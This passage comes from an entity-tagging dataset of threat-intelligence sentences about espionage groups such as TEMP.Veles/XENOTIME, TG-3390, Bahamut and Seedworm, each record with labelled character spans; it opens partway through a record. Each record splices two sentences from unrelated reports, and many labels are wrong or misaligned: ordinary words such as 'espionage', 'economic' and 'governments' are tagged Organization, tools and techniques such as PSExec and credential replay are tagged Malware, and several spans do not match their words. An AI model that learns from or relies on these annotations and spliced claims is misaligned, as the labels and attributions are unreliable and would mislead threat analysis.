"end": 203, "label": "Organization"}]} {"text": "Seedworm likely functions as a cyber espionage group to secure actionable intelligence that could benefit their sponsor 's interests . 
We identified file creation times for numerous files that TEMP.Veles created during lateral movement on a target 's network .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 31, "end": 52, "label": "Organization"}, {"start": 193, "end": 203, "label": "Organization"}]} {"text": "After compromising a system , typically by installing Powermud or Powemuddy , Seedworm first runs a tool that steals passwords saved in users ' web browsers and email , demonstrating that access to the victim 's email , social media , and chat accounts is one of their likely goals . Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow , lending some further support to the scenario that CNIIHM , a Russian research organization in Moscow , has been involved in TEMP.Veles activity .", "spans": [{"start": 54, "end": 62, "label": "System"}, {"start": 66, "end": 75, "label": "System"}, {"start": 78, "end": 86, "label": "Organization"}, {"start": 335, "end": 345, "label": "Organization"}, {"start": 428, "end": 434, "label": "Organization"}, {"start": 447, "end": 468, "label": "Organization"}, {"start": 502, "end": 512, "label": "Organization"}]} {"text": "It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data exfiltration from high-profile victim organizations . XENOTIME is easily the most dangerous threat activity publicly known .", "spans": [{"start": 56, "end": 65, "label": "Organization"}, {"start": 73, "end": 87, "label": "System"}, {"start": 236, "end": 244, "label": "Organization"}]} {"text": "In addition to stealing keystrokes , Naikon also intercepted network traffic . 
CNIIHM 's characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity .", "spans": [{"start": 37, "end": 43, "label": "Organization"}, {"start": 79, "end": 85, "label": "Organization"}, {"start": 181, "end": 191, "label": "Organization"}]} {"text": "Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals . Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks .", "spans": [{"start": 67, "end": 76, "label": "Organization"}, {"start": 81, "end": 89, "label": "Organization"}, {"start": 116, "end": 131, "label": "Organization"}, {"start": 165, "end": 185, "label": "Organization"}, {"start": 188, "end": 194, "label": "Organization"}, {"start": 229, "end": 258, "label": "Malware"}, {"start": 295, "end": 303, "label": "Organization"}, {"start": 414, "end": 426, "label": "Malware"}]} {"text": "PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data exfiltration . 
XENOTIME rose to prominence in December 2017 when Dragos and FireEye jointly published details of TRISIS destructive malware targeting Schneider Electric 's Triconex safety instrumented system .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 115, "end": 123, "label": "Organization"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 176, "end": 183, "label": "Organization"}, {"start": 213, "end": 219, "label": "Malware"}]} {"text": "Last year , Microsoft researchers described Neodymium 's behavior as unusual : \" unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . Targeting a safety system indicates significant damage and loss of human life were either intentional or acceptable goals of the attack , a consequence not seen in previous disruptive attacks such as the 2016 CRASHOVERRIDE malware that caused a power loss in Ukraine .", "spans": [{"start": 12, "end": 21, "label": "Organization"}, {"start": 44, "end": 53, "label": "Organization"}, {"start": 93, "end": 108, "label": "Organization"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 188, "end": 198, "label": "Organization"}, {"start": 203, "end": 212, "label": "Organization"}, {"start": 506, "end": 519, "label": "Malware"}, {"start": 520, "end": 527, "label": "Malware"}]} {"text": "Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . 
XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts .", "spans": [{"start": 12, "end": 27, "label": "Organization"}, {"start": 86, "end": 94, "label": "Organization"}, {"start": 107, "end": 117, "label": "Organization"}, {"start": 122, "end": 131, "label": "Organization"}, {"start": 216, "end": 224, "label": "Organization"}, {"start": 230, "end": 259, "label": "Malware"}, {"start": 287, "end": 294, "label": "System"}, {"start": 342, "end": 348, "label": "Malware"}]} {"text": "The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods . Dragos' data indicates XENOTIME remains active .", "spans": [{"start": 24, "end": 37, "label": "System"}, {"start": 257, "end": 264, "label": "Organization"}, {"start": 280, "end": 288, "label": "Organization"}]} {"text": "In March 2016 , Symantec published a blog on Suckfly , an advanced cyberespionage group that conducted attacks against a number of South Korean organizations to steal digital certificates . TEMP.Veles created a custom malware framework and tailormade credential gathering tools , but an apparent misconfiguration prevented the attack from executing properly .", "spans": [{"start": 16, "end": 24, "label": "Organization"}, {"start": 190, "end": 200, "label": "Organization"}, {"start": 211, "end": 217, "label": "Malware"}, {"start": 218, "end": 225, "label": "Malware"}, {"start": 240, "end": 277, "label": "Malware"}]} {"text": "During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations . 
Furthermore , Dragos' analysis of the TRISIS event continues as we recover additional data surrounding the incident .", "spans": [{"start": 80, "end": 89, "label": "Organization"}, {"start": 142, "end": 166, "label": "Organization"}, {"start": 183, "end": 190, "label": "Organization"}, {"start": 207, "end": 213, "label": "Malware"}]} {"text": "The ultimate objective of targeted attacks is to acquire sensitive data . XENOTIME operates globally , impacting regions far outside of the Middle East , their initial target .", "spans": [{"start": 74, "end": 82, "label": "Organization"}]} {"text": "Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information . Intelligence suggests the group has been active since at least 2014 and is presently operating in multiple facilities targeting safety systems beyond Triconex .", "spans": [{"start": 26, "end": 33, "label": "Organization"}, {"start": 71, "end": 75, "label": "System"}]} {"text": "Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs . Dragos instead focuses on threat behaviors and appropriate detection and response .", "spans": [{"start": 28, "end": 31, "label": "Organization"}, {"start": 56, "end": 63, "label": "Organization"}, {"start": 165, "end": 187, "label": "Organization"}, {"start": 193, "end": 204, "label": "Organization"}, {"start": 216, "end": 222, "label": "Organization"}]} {"text": "CTU researchers have discovered numerous details about TG-3390 operations , including how the adversaries explore a network , move laterally , and exfiltrate data . 
Dragos assesses with moderate confidence that XENOTIME intends to establish required access and capability to cause a potential , future disruptive\u2014or even destructive\u2014event .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 55, "end": 62, "label": "Organization"}, {"start": 165, "end": 171, "label": "Organization"}, {"start": 211, "end": 219, "label": "Organization"}]} {"text": "Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain . However , full details on XENOTIME and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": [{"start": 166, "end": 174, "label": "Organization"}, {"start": 282, "end": 298, "label": "Organization"}]} {"text": "As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace . This seems confusing as FireEye earlier publicly declared the TRITON as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" .", "spans": [{"start": 177, "end": 184, "label": "Organization"}, {"start": 215, "end": 221, "label": "Malware"}, {"start": 265, "end": 285, "label": "Organization"}, {"start": 311, "end": 321, "label": "Organization"}]} {"text": "This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" . 
This seems confusing as FireEye earlier publicly declared the \" TRITON actor \" as a discrete entity , linked to a Russian research institution , and christened it as \" TEMP.Veles \" .", "spans": [{"start": 220, "end": 227, "label": "Organization"}, {"start": 260, "end": 266, "label": "Malware"}, {"start": 318, "end": 338, "label": "Organization"}, {"start": 364, "end": 374, "label": "Organization"}]} {"text": "Dell SecureWorks researchers unveiled a report on Threat Group-3390 that has targeted companies around the world while stealing massive amounts of industrial data . Meanwhile , parallel work at Dragos ( my employer , where I have performed significant work on the activity described above ) uncovered similar conclusions concerning TTPs and behaviors , for both the 2017 event and subsequent activity in other industrial sectors .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 57, "end": 67, "label": "Organization"}, {"start": 194, "end": 200, "label": "Organization"}, {"start": 410, "end": 428, "label": "Organization"}]} {"text": "LAS VEGAS\u2014Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data . 
FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \" TRITON actor \" when preparing to deploy the TRITON/TRISIS malware framework in 2017 .", "spans": [{"start": 67, "end": 83, "label": "Organization"}, {"start": 245, "end": 252, "label": "Organization"}, {"start": 349, "end": 355, "label": "Malware"}, {"start": 393, "end": 406, "label": "Malware"}, {"start": 407, "end": 414, "label": "Malware"}]} {"text": "Once inside networks , the group generally targeted Windows network domain controllers and Exchange e-mail servers , targeting user credentials to allow them to move to other systems throughout the targeted network . Based on information gained from discussion with the initial TRITON/TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye 's analysis published in April 2019 , described in various media .", "spans": [{"start": 278, "end": 291, "label": "Malware"}, {"start": 362, "end": 368, "label": "Organization"}, {"start": 453, "end": 460, "label": "Organization"}, {"start": 520, "end": 525, "label": "Organization"}]} {"text": "Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from . 
Since late 2018 , based upon the most-recent posting , FireEye appears to have \" walked back \" the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \" TRITON actor \" , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": [{"start": 199, "end": 206, "label": "Organization"}, {"start": 274, "end": 284, "label": "Organization"}, {"start": 332, "end": 338, "label": "Malware"}, {"start": 355, "end": 361, "label": "Organization"}, {"start": 438, "end": 446, "label": "Organization"}]} {"text": "However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused . Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": [{"start": 154, "end": 160, "label": "Organization"}, {"start": 237, "end": 245, "label": "Organization"}]} {"text": "The primary goal of these attacks was likely to find code-signing certificates for signing future malware . Aside from the competitive vendor naming landscape ( which I am not a fan of in cases on direct overlap , but which has more to say for itself when different methodologies are employed around similar observations ) , the distinction between FireEye and Dragos' approaches with respect to the \" TRITON actor \" comes down to fundamental philosophical differences in methodology .", "spans": [{"start": 349, "end": 356, "label": "Organization"}, {"start": 361, "end": 368, "label": "Organization"}, {"start": 402, "end": 408, "label": "Malware"}]} {"text": "ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems . 
In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON .", "spans": [{"start": 43, "end": 63, "label": "System"}, {"start": 264, "end": 274, "label": "Organization"}, {"start": 277, "end": 284, "label": "Organization"}, {"start": 353, "end": 363, "label": "Organization"}, {"start": 386, "end": 392, "label": "Malware"}]} {"text": "ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities . My understanding is FireEye labels entities where definitive attribution is not yet possible with the \" TEMP \" moniker ( hence , TEMP.Veles ) \u2013 yet in this case FireEye developed and deployed the label , then appeared to move away from it in subsequent reporting .", "spans": [{"start": 150, "end": 157, "label": "Organization"}, {"start": 234, "end": 238, "label": "Organization"}, {"start": 259, "end": 269, "label": "Organization"}, {"start": 291, "end": 298, "label": "Organization"}]} {"text": "A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology . In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) .", "spans": [{"start": 78, "end": 93, "label": "Organization"}, {"start": 146, "end": 154, "label": "Organization"}, {"start": 299, "end": 320, "label": "Organization"}]} {"text": "Dragos does not corroborate nor conduct political attribution to threat activity . 
Of note , this methodology of naming abstracts away the \" who \" element \u2013 XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 157, "end": 165, "label": "Organization"}, {"start": 225, "end": 245, "label": "Organization"}]} {"text": "As recently as this past week , researchers observed Chinese hackers escalating cyber-attack efforts to steal military research secrets from US universities . Much like the observers watching the shadows of objects cast upon the wall of the cave , these two definitions ( XENOTIME and TEMP.Veles , both presumably referring to \" the TRITON actor \" ) describe the same phenomena , yet at the same time appear different .", "spans": [{"start": 144, "end": 156, "label": "Organization"}, {"start": 272, "end": 280, "label": "Organization"}, {"start": 285, "end": 295, "label": "Organization"}, {"start": 333, "end": 339, "label": "Organization"}]} {"text": "The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states . To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts .", "spans": [{"start": 28, "end": 38, "label": "Organization"}, {"start": 272, "end": 275, "label": "Organization"}, {"start": 297, "end": 304, "label": "Indicator"}]} {"text": "Like many espionage campaigns , much of APT40 's activity begins by attempting to trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network . 
CTU researchers assess with high confidence that threat groups like Threat Group-1314 will continue to live off of the land to avoid detection and conduct their operations .", "spans": [{"start": 40, "end": 45, "label": "Organization"}, {"start": 156, "end": 172, "label": "System"}, {"start": 224, "end": 227, "label": "Organization"}, {"start": 292, "end": 309, "label": "Organization"}]} {"text": "The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies . Analysis of TG-3390 's operations , targeting , and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China .", "spans": [{"start": 144, "end": 172, "label": "Organization"}, {"start": 187, "end": 194, "label": "Organization"}, {"start": 237, "end": 240, "label": "Organization"}, {"start": 316, "end": 333, "label": "Organization"}]} {"text": "We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems . The threat actors target a wide range of organizations : CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects , but also targeting other industry verticals and attacking organizations involved in international relations .", "spans": [{"start": 225, "end": 228, "label": "Organization"}, {"start": 255, "end": 262, "label": "Organization"}]} {"text": "Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably . 
In comparison to other threat groups , TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 69, "end": 84, "label": "System"}, {"start": 216, "end": 223, "label": "Organization"}, {"start": 266, "end": 275, "label": "Organization"}, {"start": 301, "end": 316, "label": "Malware"}, {"start": 321, "end": 338, "label": "Malware"}]} {"text": "One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software . CTU researchers have evidence that the TG-3390 compromised U.S. and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": [{"start": 184, "end": 203, "label": "System"}, {"start": 206, "end": 209, "label": "Organization"}, {"start": 245, "end": 252, "label": "Organization"}, {"start": 320, "end": 333, "label": "Organization"}, {"start": 349, "end": 358, "label": "Organization"}, {"start": 371, "end": 390, "label": "Organization"}, {"start": 395, "end": 405, "label": "Organization"}, {"start": 408, "end": 418, "label": "Organization"}, {"start": 421, "end": 427, "label": "Organization"}, {"start": 434, "end": 449, "label": "Organization"}, {"start": 454, "end": 463, "label": "Organization"}, {"start": 470, "end": 475, "label": "Organization"}]} {"text": "Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords . 
Based on analysis of the group 's SWCs , TG-3390 operations likely affect organizations in other countries and verticals .", "spans": [{"start": 182, "end": 186, "label": "Malware"}, {"start": 189, "end": 196, "label": "Organization"}]} {"text": "Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations \u2013 not destructive attacks or fraud . TG-3390 operates a broad and long-running campaign of SWCs and has compromised approximately 100 websites as of this publication .", "spans": [{"start": 11, "end": 18, "label": "Organization"}, {"start": 135, "end": 142, "label": "Organization"}]} {"text": "Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , exfiltration of intellectual property regarding technology has been seen ) , and personal information fi\"om the victim 's network . CTU researchers have evidence that the threat group compromised U.S. 
and UK organizations in the following verticals : manufacturing ( specifically aerospace ( including defense contractors ) , automotive , technology , energy , and pharmaceuticals ) , education , and legal , as well as organizations focused on international relations .", "spans": [{"start": 254, "end": 264, "label": "Organization"}, {"start": 338, "end": 341, "label": "Organization"}, {"start": 457, "end": 470, "label": "Organization"}, {"start": 486, "end": 495, "label": "Organization"}, {"start": 508, "end": 527, "label": "Organization"}, {"start": 532, "end": 542, "label": "Organization"}, {"start": 545, "end": 555, "label": "Organization"}, {"start": 558, "end": 564, "label": "Organization"}, {"start": 571, "end": 586, "label": "Organization"}, {"start": 591, "end": 600, "label": "Organization"}, {"start": 607, "end": 612, "label": "Organization"}]} {"text": "Based on the mutexes and domain names of some of their C&C servers , BlackTech 's campaigns are likely designed to steal their target 's technology . Like many threat groups , TG-3390 conducts strategic web compromises ( SWCs ) , also known as watering hole attacks , on websites associated with the target organization 's vertical or demographic to increase the likelihood of finding victims with relevant information .", "spans": [{"start": 176, "end": 183, "label": "Organization"}]} {"text": "Bookworm has little malicious functionality built-in , with its only core ability involving stealing keystrokes and clipboard contents . Through an IP address whitelisting process , the threat group selectively targets visitors to these websites .", "spans": [{"start": 0, "end": 8, "label": "System"}]} {"text": "Also , Bookworm uses a combination of encryption and compression algorithms to obfuscate the traffic between the system and C2 server . 
After the initial compromise , TG-3390 delivers the HTTPBrowser backdoor to its victims .", "spans": [{"start": 7, "end": 15, "label": "System"}, {"start": 167, "end": 174, "label": "Organization"}, {"start": 188, "end": 208, "label": "Malware"}]} {"text": "They have different functions and ways of spreading , but the same purpose \u2014 to steal money from the accounts of businesses . CTU researchers assess with high confidence that TG-3390 uses information gathered from prior reconnaissance activities to selectively compromise users who visit websites under its control .", "spans": [{"start": 113, "end": 123, "label": "Organization"}, {"start": 126, "end": 129, "label": "Organization"}, {"start": 175, "end": 182, "label": "Organization"}]} {"text": "At that time it was the name of a cybercriminal group that was stealing money from Russian financial establishments \u2014 to the tune of at least $150,000 per hit . TG-3390 uses the PlugX remote access tool .", "spans": [{"start": 91, "end": 115, "label": "Organization"}, {"start": 161, "end": 168, "label": "Organization"}, {"start": 178, "end": 202, "label": "Malware"}]} {"text": "Estimating the damages is challenging , but as we learned , the criminals are siphoning off assets in transactions that do not exceed $15,000 each . The SWC of a Uyghur cultural website suggests intent to target the Uyghur ethnic group , a Muslim minority group primarily found in the Xinjiang region of China .", "spans": [{"start": 216, "end": 235, "label": "Organization"}, {"start": 240, "end": 261, "label": "Organization"}]} {"text": "Once an exploitable page is identified , Clever Kitten will attempt to upload a PHP backdoor to gain remote access to the system . 
The threat actors have used the Baidu search engine , which is only available in Chinese , to conduct reconnaissance activities .", "spans": [{"start": 163, "end": 182, "label": "Malware"}]} {"text": "Once an exploitable page is identified , the actor will attempt to upload a PHP backdoor to gain remote access to the system . Recently , CTU researchers responded to an intrusion perpetrated by Threat Group-1314 , one of numerous threat groups that employ the \" living off the land \" technique to conduct their intrusions .", "spans": [{"start": 138, "end": 141, "label": "Organization"}, {"start": 195, "end": 212, "label": "Organization"}]} {"text": "In Clever Kitten 's attacks , the goal is lateral movement ; this is an attempt to move further into the target environment in order to begin intelligence collection . CTU researchers have observed the Threat Group-3390 obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. military capability , or both .", "spans": [{"start": 168, "end": 171, "label": "Organization"}, {"start": 209, "end": 219, "label": "Organization"}, {"start": 257, "end": 269, "label": "Organization"}, {"start": 387, "end": 406, "label": "Organization"}]} {"text": "Confucius' operations include deploying bespoke backdoors and stealing files from their victim 's systems with tailored file stealers , some of which bore resemblances to Patchwork 's . CTU researchers have observed the threat group obtaining information about specific U.S. defense projects that would be desirable to those operating within a country with a manufacturing base , an interest in U.S. 
military capability , or both .", "spans": [{"start": 171, "end": 180, "label": "Organization"}, {"start": 186, "end": 189, "label": "Organization"}, {"start": 270, "end": 282, "label": "Organization"}, {"start": 400, "end": 419, "label": "Organization"}]} {"text": "Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions \u2014 which are often not designed to handle the persistent and sophisticated threats detailed in this blog \u2014 ineffective . TG-3390 can quickly leverage compromised network infrastructure during an operation and can conduct simultaneous intrusions into multiple environments .", "spans": [{"start": 19, "end": 28, "label": "Organization"}, {"start": 33, "end": 42, "label": "Organization"}, {"start": 282, "end": 289, "label": "Organization"}]} {"text": "In order to increase the likelihood of their malware successfully communicating home , cyber espionage threat actors are increasingly abusing legitimate web services , in lieu of DNS lookups to retrieve a command and control address . Malware used by the threat group can be configured to bypass network-based detection ; however , the threat actors rarely modify host-based configuration settings when deploying payloads .", "spans": [{"start": 235, "end": 242, "label": "Malware"}]} {"text": "To spread the Corkow malware criminals use a drive-by downloads method , when victims are infected while visiting compromised legitimate websites . 
TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication .", "spans": [{"start": 148, "end": 155, "label": "Organization"}, {"start": 204, "end": 207, "label": "Organization"}, {"start": 262, "end": 270, "label": "Vulnerability"}]} {"text": "Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc . In addition to using SWCs to target specific types of organizations , TG-3390 uses spearphishing emails to target specific victims .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 85, "end": 107, "label": "System"}, {"start": 110, "end": 122, "label": "System"}, {"start": 125, "end": 141, "label": "System"}, {"start": 144, "end": 171, "label": "System"}, {"start": 174, "end": 187, "label": "System"}, {"start": 217, "end": 221, "label": "Malware"}, {"start": 266, "end": 273, "label": "Organization"}, {"start": 293, "end": 299, "label": "System"}]} {"text": "Metel is a banking Trojan ( also known as Corkow ) discovered in 2011 when it was used to attack users of online banking services . 
After gaining access to a target network in one intrusion analyzed by CTU researchers , TG-3390 actors identified and exfiltrated data for specific projects run by the target organization , indicating that they successfully obtained the information they sought .", "spans": [{"start": 0, "end": 5, "label": "System"}, {"start": 11, "end": 25, "label": "System"}, {"start": 42, "end": 48, "label": "Organization"}, {"start": 202, "end": 205, "label": "Organization"}, {"start": 220, "end": 227, "label": "Organization"}]} {"text": "After the infection stage , criminals move laterally with the help of legitimate and pentesting tools , stealing passwords from their initial victims ( entry point ) to gain access to the computers within the organization that have access to money transactions . Based on this information , CTU researchers assess that TG-3390 aims to collect defense technology and capability intelligence , other industrial intelligence , and political intelligence from governments and NGOs .", "spans": [{"start": 291, "end": 294, "label": "Organization"}, {"start": 319, "end": 326, "label": "Organization"}, {"start": 428, "end": 450, "label": "Organization"}, {"start": 456, "end": 467, "label": "Organization"}]} {"text": "Delivering a backdoor and spyware , this campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . 
Incident response engagements have given CTU researchers insight into the tactics TG-3390 employs during intrusions .", "spans": [{"start": 313, "end": 316, "label": "Organization"}, {"start": 354, "end": 361, "label": "Organization"}]} {"text": "Delivering a backdoor and spyware , Desert Falcons 's campaign was designed to steal information from infected systems using a malware client capable of filtering out \" uninteresting \" files , and spread primarily via a targeted phishing email usually promising a pornographic video . CTU researchers have not observed TG-3390 actors performing reconnaissance prior to compromising organizations .", "spans": [{"start": 285, "end": 288, "label": "Organization"}, {"start": 319, "end": 326, "label": "Organization"}, {"start": 369, "end": 395, "label": "Organization"}]} {"text": "Talos said the perpetrators of DNSpionage were able to steal email and other login credentials from a number of government and private sector entities in Lebanon and the United Arab Emirates by hijacking the DNS servers for these targets , so that all email and virtual private networking ( VPN ) traffic was redirected to an Internet address controlled by the attackers . 
CTU researchers have observed the threat actors installing a credential logger and backdoor on Microsoft Exchange servers , which requires a technical grasp of Internet Information Services ( IIS ) .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 112, "end": 122, "label": "Organization"}, {"start": 291, "end": 294, "label": "System"}, {"start": 373, "end": 376, "label": "Organization"}, {"start": 434, "end": 451, "label": "Malware"}, {"start": 468, "end": 477, "label": "Organization"}, {"start": 533, "end": 562, "label": "System"}, {"start": 565, "end": 568, "label": "System"}]} {"text": "Talos reported that these DNS hijacks also paved the way for the attackers to obtain SSL encryption certificates for the targeted domains ( e.g.webmail.finance.gov.lb ) , which allowed them to decrypt the intercepted email and VPN credentials and view them in plain text . TG-3390 is capable of using a C2 infrastructure that spans multiple networks and registrars .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 273, "end": 280, "label": "Organization"}]} {"text": "This APT group usually carries out target attacks against government agencies to steal sensitive information . TG-3390 SWCs may be largely geographically independent , but the group 's most frequently used C2 registrars and IP net blocks are located in the U.S .", "spans": [{"start": 58, "end": 77, "label": "Organization"}, {"start": 111, "end": 118, "label": "Organization"}, {"start": 206, "end": 208, "label": "System"}, {"start": 224, "end": 226, "label": "Indicator"}]} {"text": "All attackers simply moved to new C2 infrastructure , based largely around dynamic DNS domains , in addition to making minimal changes to the malware in order to evade signature-based detection . Using a U.S. based C2 infrastructure to compromise targets in the U.S. 
helps TG-3390 actors avoid geo-blocking and geo-flagging measures used in network defense .", "spans": [{"start": 215, "end": 217, "label": "System"}, {"start": 273, "end": 280, "label": "Organization"}]} {"text": "With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate . The threat actors create PlugX DLL stub loaders that will run only after a specific date .", "spans": [{"start": 5, "end": 11, "label": "System"}, {"start": 62, "end": 66, "label": "Organization"}, {"start": 70, "end": 73, "label": "System"}, {"start": 78, "end": 93, "label": "System"}, {"start": 121, "end": 130, "label": "Malware"}]} {"text": "During these intrusions , LEAD 's objective was to steal sensitive data , including research materials , process documents , and project plans . The compile dates of the samples analyzed by CTU researchers are all later than the hard-coded August 8 , 2013 date , indicating that the code might be reused from previous tools .", "spans": [{"start": 190, "end": 193, "label": "Organization"}]} {"text": "While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions . One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets ( see Figure 8 ) , and an HTTPBrowser installer disguised as an image file .", "spans": [{"start": 36, "end": 49, "label": "Organization"}, {"start": 303, "end": 306, "label": "Organization"}, {"start": 342, "end": 350, "label": "Malware"}, {"start": 417, "end": 438, "label": "Malware"}]} {"text": "In Russia , there were several relatively large cybercriminal groups engaged in financial theft via attacks on RBS . 
CTU researchers have observed TG-3390 activity between 04:00 and 09:00 UTC , which is 12:00 to 17:00 local time in China ( UTC +8 ) .", "spans": [{"start": 117, "end": 120, "label": "Organization"}]} {"text": "Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk . TG-3390 sends spearphishing emails with ZIP archive attachments .", "spans": [{"start": 178, "end": 184, "label": "System"}, {"start": 192, "end": 196, "label": "System"}, {"start": 199, "end": 206, "label": "Organization"}, {"start": 227, "end": 233, "label": "System"}]} {"text": "Cadelle 's threats are capable of opening a back door and stealing information from victims' computers . CTU researchers have observed TG-3390 compromising a target organization 's externally and internally accessible assets , such as an OWA server , and adding redirect code to point internal users to an external website that hosts an exploit and delivers malware .", "spans": [{"start": 105, "end": 108, "label": "Organization"}, {"start": 135, "end": 142, "label": "Organization"}, {"start": 337, "end": 344, "label": "Vulnerability"}]} {"text": "These threats are capable of opening a back door and stealing information from victims' computers . TG-3390 actors have used Java exploits in their SWCs .", "spans": [{"start": 100, "end": 107, "label": "Organization"}, {"start": 125, "end": 129, "label": "System"}, {"start": 148, "end": 152, "label": "Malware"}]} {"text": "Callisto Group appears to be intelligence gathering related to European foreign and security policy . 
In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": [{"start": 118, "end": 125, "label": "Organization"}, {"start": 140, "end": 153, "label": "Vulnerability"}, {"start": 221, "end": 241, "label": "Malware"}, {"start": 248, "end": 261, "label": "Vulnerability"}, {"start": 283, "end": 288, "label": "Malware"}, {"start": 389, "end": 396, "label": "Vulnerability"}]} {"text": "Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform . In activity analyzed by CTU researchers , TG-3390 executed the Hunter web application scanning tool against a target server running IIS .", "spans": [{"start": 25, "end": 39, "label": "Organization"}, {"start": 186, "end": 196, "label": "System"}, {"start": 284, "end": 287, "label": "Organization"}, {"start": 302, "end": 309, "label": "Organization"}, {"start": 323, "end": 359, "label": "Malware"}, {"start": 392, "end": 395, "label": "System"}]} {"text": "Called Greenbug , this group is believed to be instrumental in helping Shamoon steal user credentials of targets ahead of Shamoon 's destructive attacks . 
